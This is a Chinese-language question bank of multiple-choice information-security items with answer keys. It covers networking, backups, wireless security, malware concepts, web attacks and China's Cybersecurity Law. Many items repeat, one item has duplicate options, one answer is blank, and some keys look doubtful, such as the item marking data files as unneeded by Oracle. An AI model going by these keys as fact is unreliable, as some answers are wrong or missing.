您的答案: 标准答案: B

45、 计算机机房灭火使用的是( )

A、 二氧化碳

B、 干粉

C、 七氟丙烷

D、 水

您的答案: 标准答案: C

46、关于计算机机房防静电说法错误的是( )

A、 采用防静电地板;工作人员要求穿着防静电的衣服和鞋袜进入机房工作

B、 室内保持相对湿度允许范围为:45%一65%;计算机与地板有效接地

C、 安装屏蔽材料

D、 机房中办公设备或辅助设备材料应尽量采用产生静电少的材料制作的

您的答案: 标准答案: C

47、 网络准入控制主要组件不包含( )

A、 终端安全检查软件

B、 网络接入设备(接入交换机和无线访问点)

C、 策略/AAA服务器

D、 堡垒主机

您的答案: 标准答案: D

48、以下关于Windows服务器操作系统的特点,说法不正确的是( )

A、 允许在X86架构下硬件平台上安装和使用,能够支持各种网络协议和网络服务

B、 提供必要的网络连接支持,能够连接不同的网络

C、 能够进行系统安全性保护和用户存取权限的控制

D、 具有一定的可扩展性、可用性及易管理性

您的答案: 标准答案: D

49、应急事件分级的依据有哪些( )

A、 事件影响范围和业务重要程度

B、 应急事件类型

C、 应急预案启动的级别

D、 事件分析分析和评估

您的答案: 标准答案: A

50、从信息系统安全角度来看,用于IT项目的业务模板(或案例)文档应该被保留,其保留期为( )

A、 系统的生命周期结束

B、 项目获得批准

C、 用户验收

D、 系统被投入生产

您的答案: 标准答案: A

1、快照技术是一种在线方式的数据保护策略,说法错误的是( )

A、 .基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

您的答案: 标准答案: D

2、下面关于SSID说法错误的是( )

A、 通过对多个无线接入点AP设置不同的SSID,并要求无线工作站出示正确的SSID才能访问AP

B、 提供了40位和128位长度的密钥机制

C、 只有设置为名称相同SSID的值的电脑才能互相通信

D、 SSID就是一个局域网的名称

您的答案: 标准答案: C

3、 物联网是一种虚拟网络与现实世界实时交互的新型系统,关于特点描述错误的是( )

A、 无处不在的数据感知

B、 以无线为主的信息传输

C、 智能化的信息处理

D、 以物理网传输为主干网

您的答案: 标准答案: D

4、 关于数据备份策略的分类,说法错误的是( )

A、 按照备份的数据量可以分为完全备份、增量备份、差异备份

B、 完全备份所需时间最长,恢复所需时间最短

C、 差异备份节省了磁盘空间,但备份时间比较长

D、 增量备份只备份与前一次相比增加或者被修改的文件、数据

您的答案: 标准答案: C

5、 以下哪一项不是物联网的安全问题( )

A、 感知层安全问题

B、 传输层安全问题

C、 系统层安全问题

D、 应用层安全问题

您的答案: 标准答案: C

6、 将单位内部的局域网接入Internet(因特网)所需使用的接入设备是______。

A、 安全审计设备

B、 集线器

C、 路由器

D、 中继转发器

您的答案: 标准答案: C

7、下列关于Android的描述正确的是______。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

您的答案: 标准答案: B

8、Rootkit的主要目标是______。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

您的答案: 标准答案: A

9、计算机病毒有很多种类型,但不包括______。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

您的答案: 标准答案: B

10、钓鱼攻击具有下列选项中除了______以外的所有特点。

A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

您的答案: 标准答案: B

11、下列攻击行为不属于主动性攻击的是( )

A、 拒绝服务攻击(DOS)

B、 中间人攻击(MITM)

C、 网络钓鱼攻击(Phishing)

D、 社会工程学攻击

您的答案: 标准答案: C

12、下列选项中,除了______以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

您的答案: 标准答案: C

13、下列设备中,可隔绝广播风暴的是______

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

您的答案: 标准答案: A

14、关于无线局域网,下面叙述中正确的是( )

A、 802.11a 和02.11b可以在 2.4GHz 频段工作

B、 802.11b 和 802.11g 都可以在 2.4GHz 频段工作

C、 802.11a 和 802.11b 都可以在 5GHz 频段工作

D、 802.11b 和 802.11g 都可以在 5GHz 频段工作

您的答案: 标准答案: B

15、WEP协议的设计目标是:保障数据______。

A、 不可抵赖性

B、 匿名性

C、 抗干扰性

D、 完整性和机密性

您的答案: 标准答案: D

16、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

17、 从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用______来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

您的答案: 标准答案: D

18、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是______。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

您的答案: 标准答案: A

19、SSID(Service Set Identifier)______。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

您的答案: 标准答案: A

20、 保护无线网络的第一步是______。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

您的答案: 标准答案: A

21、我们通常所说的10Mb/s和100Mb/s自适应是指

A、 既工作在10Mb/s,同时也工作在100Mb/s

B、 端口之间10Mb/s和100Mb/s传输率的自动匹配功能

C、 既可工作在10Mb/s,也可工作在100Mb/s

D、 其他三项都是

您的答案: 标准答案: B

22、下列设备中,可隔绝广播风暴的是(

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

您的答案: 标准答案: A

23、无线局域网网络标准IEEE802.11的用户认证机制有______

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

您的答案: 标准答案: C

24、下列方法中,识别Email来源真实性最可靠的是______。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

您的答案: 标准答案: A

25、在需要保护的信息资产中____是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

26、来自于多个攻击源而不是单一攻击源的攻击,称作______攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

您的答案: 标准答案: A

27、DNS属于______协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

您的答案: 标准答案: A

28、浏览器能够打开百度的主页而不能打开必应主页,下列描述肯定错误的是______。

A、 由于ISP限制了IP访问策略

B、 系统遭受了DNS欺骗

C、 浏览器语言设置有误

D、 由于ISP限制了URL访问策略

您的答案: 标准答案: C

29、DNS属于( )协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

您的答案: 标准答案: A

30、 ORACLE数据库不需要使用( )结构来保护数据

A、 数据文件

B、 控制文件

C、 日志

D、 回滚段

您的答案: 标准答案: A

31、为了保证数据库的安全,可采取的措施有误的是( )

A、 自主访问控制

B、 资源控制

C、 安全审计

D、 数据加密

您的答案: 标准答案: B

32、输入正确的域名但却被转换为错误的IP地址,从而将用户指向其他目标网站,用以提高目标网站的访问量,这种攻击是( )

A、 ARP欺骗

B、 DNS欺骗

C、 会话劫持

D、 社交攻击

您的答案: 标准答案: B

33、在进行网络攻击时,隐藏攻击者较好的方法是______。

A、 采用匿名登录

B、 关闭对方的防火墙

C、 使用跳板攻击

D、 以管理员的身份登录

您的答案: 标准答案: C

34、DoS攻击不会破坏的是______。

A、 账户的授权

B、 合法用户的使用

C、 服务器的处理器资源

D、 网络设备的带宽资源

您的答案: 标准答案: A

35、在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是_______

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

您的答案: 标准答案: C

36、TCP协议一般用于______网,向用户提供一种传输可靠的服务

A、 局域网

B、 以太网

C、 广域网

D、 城域网

您的答案: 标准答案: C

37、Tracert命令通过多次向目标发送( )来确定到达目标的路径,在连续发送的多个IP数据包中,TTL字段都是不同的。

A、 ICMP地址请求报文

B、 ARP请求报文

C、 ICMP回声请求报文

D、 ARP响应报文

您的答案: 标准答案: C

38、下列不涉及OSI网络安全体系范畴的是______。

A、 网闸在任意一个具体时刻都不存在内网与外网的物理链路

B、 防火墙中通常集成有对抗DDoS功能

C、 蠕虫的传播主要依赖于对系统漏洞的利用

D、 HTTPS使用了与HTTP不同的传输端口

您的答案: 标准答案: C

39、日前,戴尔的安全威胁应对小组(CTU)检测到一个巨大的针对美国、欧盟、俄罗斯和前苏联国家的军事人员、政府官员、记者和政治活动家的谷歌账户的网络钓鱼活动,该钓鱼活动由俄罗斯APT组织发起。网络钓鱼是属于______的攻击。

A、 网络层

B、 传输层

C、 数据链路层

D、 应用层

您的答案: 标准答案: D

40、帧中继(Frame Relay)交换是以帧为单位进行交换,它是在( )上进行的。

A、 物理层

B、 数据链路层

C、 网络层

D、 运输层

您的答案: 标准答案: B

41、 某业务数据库每周六凌晨进行全库备份,每个工作日凌晨采用增量备份方式,如果想得到周二凌晨的数据库数据,以下还原过程正确的是( )

A、 还原周六的全库备份

B、 还原周六的全库备份,还原周一的增量备份,还原周二的增量备份

C、 还原周六的全库备份,还原周二的增量备份

D、 附加周二的增量备份

您的答案: 标准答案: B

42、 RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是( )

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

您的答案: 标准答案: D

43、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

您的答案: 标准答案: B

44、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可靠性

您的答案: 标准答案: D

45、下列选项中______不是灾难恢复计划的特点。

A、 仅允许首席安全官访问

B、 书面的

C、 详细的

D、 定期更新的

您的答案: 标准答案: A

46、信息安全中的木桶原理,是指____

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

47、下列关于预防网络攻击的说法正确的是( )

A、 网站服务器操作系统和 个人电脑 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是多采用防火墙设备。

您的答案: 标准答案: C

48、网络管理的功能有_______

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

您的答案: 标准答案: D

49、信息安全管理最关注的是_____

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

您的答案: 标准答案: C

50、在信息系统安全中,风险由______两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

您的答案: 标准答案: C

1、如果想要限制用户过多的占用磁盘空间,应当______

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

2、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该______

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

您的答案: 标准答案: A

3、Windows紧急修复盘不能修复下列哪个项目______

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

4、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是______

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

您的答案: 标准答案: D

5、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是(

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat –ano

您的答案: 标准答案: D

6、单位出于安全考虑对内部地址做动态网络地址转换(NAT),不正确的说法是( )

A、 将很多内部地址映射到单个真实地址

B、 外部网络地址和内部地址一对一的映射

C、 最多可有64000个同时的动态NAT连接

D、 每个连接使用一个端口

您的答案: 标准答案: B

7、下列说法中不正确的是( )

A、 各信息系统运营使用单位和主管部门是信息系统定级的责任主体

B、 在安全评估过程中,采用渗透性测试手段,检测系统脆弱性

C、 信息系统的等级应由业务信息系统和服务系统的较高者决定

D、 信息保密性可分为秘密和机密两个等级

您的答案: 标准答案: D

8、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的( )属性

A、 保密性

B、 完整性

C、 抗抵赖性

D、 可用性

您的答案: 标准答案: D

9、 对于信息安全管理负有责任的是( )

A、 高级管理层

B、 安全管理员

C、 IT管理员

D、 所有与信息系统有关人员

您的答案: 标准答案: D

10、重要安全区域部署安全审计跟踪的是( )

A、 安全审计系统检测并追踪安全事件的过程

B、 安全审计系统收集易于安全审计的数据

C、 人利用日志信息进行安全事件分析和追溯的过程

D、 对计算机系统中的某种行为的详尽跟踪和观察

您的答案: 标准答案: A

11、是企业信息安全的核心( )

A、 安全教育

B、 安全运维措施

C、 安全管理

D、 安全软硬件设施

您的答案: 标准答案: C

12、计算机机房应当符合( )和国家有关规定

A、 防火、防盗、防潮、防尘要求

B、 楼层、位置要求

C、 相关行业标准

D、 国家标准

您的答案: 标准答案: D

13、 网络安全在多网合一时代的脆弱性主要体现在( )

A、 软件的脆弱性

B、 网络的脆弱性

C、 管理的脆弱性

D、 应用的脆弱性

您的答案: 标准答案: C

14、以下哪种不是主机连接存储的常见方式______

A、 DAS

B、 NAS

C、 SAN

D、 IAS

您的答案: 标准答案: D

15、网络扫描器不可能发现的是______。

A、 用户的弱口令

B、 系统的服务类型

C、 系统的版本

D、 用户的键盘动作

您的答案: 标准答案: D

16、HOOK是安全防护软件及恶意软件经常用到劫持技术,将目标函数代码的前面几个字节替换为指向目标代码的跳转指令的技术为()。

A、 EAT HOOK

B、 IAT HOOK

C、 Inline HOOK

D、 IDT HOOK

您的答案: 标准答案: C

17、()破解了英格玛机?

A、 牛顿

B、 图灵

C、 比尔盖茨

D、 赫敏

您的答案: 标准答案: B

18、“进不来” “拿不走” “看不懂” “改不了” “走不脱”是网络信息安全建设的目的。其中,“看不懂”是指下面那种安全服务:

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

您的答案: 标准答案: A

19、______用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

您的答案: 标准答案: B

20、______是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

您的答案: 标准答案: D

21、以下哪个恶意软件具备穿透还原卡和还原软件的能力?

A、 求职信

B、 求职信

C、 超级工厂

D、 CIH

您的答案: 标准答案: B

22、相比之下,______最不可能隐藏恶意代码。

A、 图片文件

B、 证书文件

C、 MBR

D、 PE文件

您的答案: 标准答案: B

23、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

您的答案: 标准答案: A

24、下列对XSS攻击(跨站脚本攻击)描述正确的是______

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

您的答案: 标准答案: A

25、业务系统在开发过程中植入参数过滤策略可以预防______攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

您的答案: 标准答案: B

26、APT对抗中,整个环节最关键也是最薄弱的一环是:

A、 技术

B、 人

C、 策略

D、 管理制度

您的答案: 标准答案: B

27、业务系统在开发过程中植入参数过滤策略可以预防( )攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

您的答案: 标准答案: B

28、缓冲区溢出攻击针对的目标对象是( )

A、 只是应用层漏洞

B、 只是系统层漏洞

C、 既是系统层漏洞也是应用层漏洞

D、 硬件层漏洞

您的答案: 标准答案: C

29、还未公开的漏洞,称作______漏洞。

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

您的答案: 标准答案: D

30、______是指有能力带来威胁的人或事物

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

您的答案: 标准答案: B

31、有人通过朋友圈分享要求他人转发不良信息,否则进行恶毒诅咒。对此应______。

A、 转发信息,不过是手指动一下,转不转全看心情。

B、 此类信息一般没有积极意义,常常涉嫌人身攻击等,不应转发。

C、 涉及个人和家人安危,宁信其有不信其无,不愿意也要转。

D、 直接转发,不多考虑。

您的答案: 标准答案: B

32、正向型和反弹型木马的区别是______。

A、 正向型木马的控制端可以在Internet上使用,而反弹性木马的控制端只能在内网中使用

B、 反弹性木马的控制端可以在Internet上使用,而正向型木马的控制端只能在内网中使用

C、 反弹性木马的受控端可以在内网中使用,而正向型木马的受控端只能在Internet上使用

D、 正向型木马的受控端可以在内网中使用,而反弹性木马的受控端只能在Internet上使用

您的答案: 标准答案: C

33、快照技术是一种在线方式的数据保护策略,说法错误的是______

A、 基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

您的答案: 标准答案: D

34、该用户希望U盘中的所有可执行程序均无法运行。那么,其最合适的安全规则是()。

A、 路径规则

B、 Internet区域规则

C、 证书规则

D、 散列规则

您的答案: 标准答案: A

35、RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是_____

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

您的答案: 标准答案: D

36、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可用性

您的答案: 标准答案: D

37、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

您的答案: 标准答案: B

38、访问网址www.1cbc.com.cn,将可能遭受______攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

您的答案: 标准答案: B

39、无线拒绝服务攻击______。

A、 与有线拒绝服务攻击功能相同

B、 由于其低效性较少被攻击者使用

C、 用于拒绝无线设备访问无线路由器

D、 使用“切断关联”帧来连接到有线网络

您的答案: 标准答案: C

40、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

41、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

42、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

您的答案: 标准答案: D

43、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

44、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

45、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

您的答案: 标准答案: B

46、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

47、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

您的答案: 标准答案: D

48、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

您的答案: 标准答案: A

49、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

您的答案: 标准答案: C

50、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

1、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

2、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

3、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

您的答案: 标准答案: D

4、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

5、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

6、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

您的答案: 标准答案: B

7、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

8、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

您的答案: 标准答案: D

9、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

您的答案: 标准答案: A

10、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

您的答案: 标准答案: C

11、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

12、《中华人民共和国网络安全法》从哪天正式施行?()

A、 2017年6月1日

B、 2017年6月2日

C、 2017年6月3日

D、 2017年6月4日

您的答案: 标准答案: A

13、以下哪个不是新时代我们面临的网络危险?()

A、 木马

B、 大数据

C、 病毒

D、 僵尸网络

您的答案: 标准答案: B

14、第一次网络战争是那个国家遭到攻击?()

A、 乌克兰

B、 爱沙尼亚

C、 罗马尼亚

D、 土耳其

您的答案: 标准答案: B

15、“互联网”+行动计划是否起到了对传统产业升级的推动作用?

A、 是

您的答案: 标准答案: A

16、有关网安治理的顶层设计不包括那项?()

A、 网络安全法

B、 电子商务法

C、 电信法

D、 个人财产保护法

您的答案: 标准答案: D

17、《中华人民共和国网络安全法》发布时间是?()

A、 2017年6月1日

B、 2016年6月1日

C、 2016年11月7日

D、 2017年5月1日

您的答案: 标准答案: C

18、网络安全法是基于信息化的时代要求。

A、 是

您的答案: 标准答案: A

19、网络安全法是由几个原因促成的?()

A、 1

B、 2

C、 3

D、 4

您的答案: 标准答案: C

20、网络安全法共有多少条目?()

A、 49

B、 59

C、 69

D、 79

您的答案: 标准答案: D

21、从网络安全法本身看,什么是网络安全?()

A、 一种能力

B、 一种服务

C、 一种态度

D、 一种精神

您的答案: 标准答案: A

22、以下哪个不是数据的三性原则?()

A、 完整性

B、 再生性

C、 保密性

D、 可用性

您的答案: 标准答案: B

23、在网络安全法立法中,网络运营者不包括以下哪个?()

A、 网络所有者

B、 网络管理者

C、 网络使用者

D、 网络服务提供者

您的答案: 标准答案: C

24、关于个人信息,网络安全法采用的身份识别说,这个方法借鉴的那个国家组织立法?()

A、 欧盟

B、 美国

C、 俄罗斯

D、 联合国

您的答案: 标准答案: A

25、以下那条规定国家在网络安全领域作用与职能?()

A、 十八条

B、 十九条

C、 二十条

D、 二十一条

您的答案: 标准答案: A

26、网络运行安全主要涉及几个层次?()

A、 1

B、 2

C、 3

D、 4

您的答案: 标准答案:

27、网络运行安全的一般性要求由多少条法规规定?()

A、 5

B、 10

C、 15

D、 20

您的答案: 标准答案: C

28、我们在网络运行安全领域所采取的基本制度是网络安全等级保护制度。

A、 是

您的答案: 标准答案: A

29、网络安全保护义务具体有几项?()

A、 5

B、 4

C、 3

D、 2

您的答案: 标准答案: A

30、网络产品服务具有收集用户信息功能的,其提供者不需要向用户明示。

A、 对

B、 错

您的答案: 标准答案: B

31、国家网信部对关键基础设施一系列规定包含几项?()

A、 4

B、 3

C、 2

D、 1

您的答案: 标准答案: A

32、网安法第三十三条反应的是那个层面的安全?()

A、 技术要素

B、 组织管理

C、 在线内容

D、 运行维护

您的答案: 标准答案: A

33、关键基础设施的运营者还应该履行几项重要的安全保护义务?()

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

34、网安法第多少条规定了具有网络安全监督管理职责的部门对信息进行保密?()

A、 43

B、 44

C、 45

D、 46

您的答案: 标准答案: C

35、任何个人组织发送的电子信息可以包含任意信息。

A、 对

B、 错

您的答案: 标准答案: B

36、以下那十条详细规定了网络运营者在网络保护中应当承担的义务和责任?()

A、 第40-50条

B、 第45-55条

C、 第50-60条

D、 第55-65条

您的答案: 标准答案: A

37、以下哪项不是网络运营收集个人信息的原因?()

A、 合法

B、 正当

C、 必要

D、 盈利

您的答案: 标准答案: D

38、网络安全事件发生风险增大时,()级以上政府需要采取措施?

A、 县级

B、 市级

C、 省级

D、 中央级

您的答案: 标准答案: C

39、网络安全法中没有规定对应违法事件的刑事责任。

A、 对

B、 错

您的答案: 标准答案: B

40、网络安全法中设立的最高返款金额为()万元。

A、 一

B、 十

C、 百

D、 千

您的答案: 标准答案: C

41、网络安全法中规定:人员违法相关单位也可能会追究刑事责任。

A、 是

您的答案: 标准答案: A

42、不是所有的网络犯罪都会追究单位责任。

A、 对

B、 错

您的答案: 标准答案: B

43、非法利用信息网络罪中同时违法该条两款行为时,会受到怎样的惩罚?()

A、 两项从重处罚

B、 两项数罪并罚

C、 两项从轻处罚

D、 两项逐个处罚

您的答案: 标准答案: A

44、以下那组是网络安全法关于技术要素层面的安全规定?()

A、 第64,67,68,70条

B、 第64,69,70,73条

C、 第60,62,65,75条

D、 第59,61,63,75条

您的答案: 标准答案: C

45、民法总则是第()次对于数据与网络虚拟财产的法律属性进行规定。

A、 一

B、 二

C、 三

D、 四

您的答案: 标准答案: A

46、国家网信部门规定的重要规定有()项。

A、 6

B、 7

C、 8

D、 9

您的答案: 标准答案: D

47、最高司法机关的规范文件共有()项

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

48、根据网信部规定,通讯工具开通公众账号必须满足()的要求。

A、 缴费制

B、 公益制

C、 实名制

D、 守信制

您的答案: 标准答案: C

49、国家对于打击电信诈骗案的引发点是()。

A、 雪梨枪案

B、 北京千万电信诈骗案

C、 8·19徐玉玉电信诈骗案

D、 K8社工库侵犯公民个人信息案

您的答案: 标准答案: C

50、对于贩卖公民通信记录等重要信息入罪门槛是()条

A、 5000

B、 50000

C、 100000

D、 1000000

您的答案: 标准答案: A

1、通过____分析攻击事件能得到更准确的信息。

A、 文件修改时间

B、 IDS告警日志

C、 网站后门

D、 来源ip

您的答案: 标准答案: B

2、下列哪项不是针对内网入侵及告警分析的思路?

A、 基于IP的分析

B、 基于时间的分析

C、 基于告警级别的分析

D、 基于业务的分析

您的答案: 标准答案: D

3、下列哪项不属于DDOS的攻击方式?

A、 通过使网络过载来干扰甚至阻断正常的网络通讯

B、 通过向服务器提交大量请求,使服务器超负荷

C、 用户访问网站新功能

D、 通过向目标机发送ping包,造成网络堵塞或资源耗尽

您的答案: 标准答案: C

4、下列哪项不是JBoss的JAVA反序列化漏洞的防御方案?

A、 在源码中打入官方最新patch

B、 限定可以连接到JBoss的IP

C、 对JBoss专有用户,设置高权限

D、 在jmx-invoker-service.xml中开启权限验证

您的答案: 标准答案: C

5、下列哪项不能有效防御海量DDOS攻击?

A、 利用dns实现均衡,并加强dns自身防护能力

B、 4层负载均衡之前,构建ddos防护系统

C、 在4层与7层之间均实现HTTP Flood防护

D、 在用户请求过多时,限制所有用户请求

您的答案: 标准答案: D

6、下列哪项不是web应用中使用cookie会话机制可能造成的风险?

A、 会话劫持

B、 造成缓冲区溢出

C、 cookie注入

D、 信息泄露

您的答案: 标准答案: B

7、下列哪项不是Redis未授权访问缺陷解决方案?

A、 尽可能不对公网直接开放 SSH 服务

B、 在内网中使用简单的密码,方便测试

C、 对 redis 访问启用密码认证,并且添加 IP 访问限制和修改redis的默认端口6379

D、 禁止使用 root 权限启动 redis 服务

您的答案: 标准答案: B

8、下列哪项不是可移动终端程序可能受到的攻击?

A、 对用户数据请求进行加密

B、 拒绝服务:是合法用户无法获得资源

C、 破坏或修改数据

D、 泄露用户或主机的机密信息

